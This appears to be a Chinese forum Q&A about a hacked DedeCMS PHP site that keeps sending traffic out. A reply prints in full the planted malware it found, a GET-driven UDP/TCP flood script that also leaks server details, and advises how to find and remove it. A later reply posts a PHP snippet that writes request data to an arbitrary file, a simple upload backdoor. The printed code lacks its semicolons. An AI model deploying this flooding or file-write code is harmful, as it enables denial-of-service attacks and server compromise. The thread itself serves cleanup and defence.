php程序总是对外发包应该怎么解决？

嗯，dede 最近漏洞比较多，我之前也遇到过，程序影藏的很深，我之前的是在 /include/js/jquery/article_aee.php

这个文件，当然可能文件位置有所变动，但发包的代码可能不会变，你全站搜索下看有没有这段代码：

<?php

set_time_limit(86400)

ignore_user_abort(True)

$packets = 0

$http = $_GET['http']

$rand = $_GET['exit']

$exec_time = $_GET['time']

if (StrLen($http)==0 or StrLen($rand)==0 orStrLen($exec_time)==0)

{

if(StrLen($_GET['rat'])<>0)

{

echo$_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']

exit

}

echo "Php 2012 Terminator"

exit

}

 

for($i=0$i<65535$i++)

{

$out .= "X"

}

//Udp1-fsockopen Udp2 pfsockopen Tcp3CC.center

$max_time = time()+$exec_time

if($rand==53)

while(1)

{

$packets++

if(time() > $max_time)

{

break

}

$fp = fsockopen("udp://$http",$rand, $errno, $errstr, 5)

if($fp)

{

fwrite($fp, $out)

fclose($fp)

}

}

else

if($rand==500)

while(1)

{

$packets++

if(time() > $max_time){

break

}

$fp = pfsockopen("udp://$http",$rand, $errno, $errstr, 5)

if($fp)

{

fwrite($fp, $out)

fclose($fp)

}

}

else

while(1)

{

$packets++

if(time() > $max_time){

break

}

$fp = pfsockopen("tcp://$http",$rand, $errno, $errstr, 5)

if($fp)

{

fwrite($fp, $out)

fclose($fp)

}

}

?>

这个代码 就是对我发包的，通过url 请求 带参数 对外发包，希望对你所有帮助！

你最好也登陆FTP看下，有没有最近上传的文件，对最近服务器里面出现的文件进行排查，相信你也会找到病毒程序的。

发包文件是注入在数据库里面的，就算你删除了文件，当你的网站运行时，数据库又会生成一个发包文件出来，请检查你的数据库将这段代码删除，然后重装就可以了，为避免再次被注入，建议升级到最新的版本。

不错。

<?php

$fp=fopen("路径“,"w")

fwrite($fp,

$_POST["POST值名"])

fclose($fp)

?>

这是PHP代码，至于VB发包就不说了，PHP代码自己改，如果要获取GET的值把$_POST改为$_GET，如果POST和GET皆可，就用$_REQUEST

---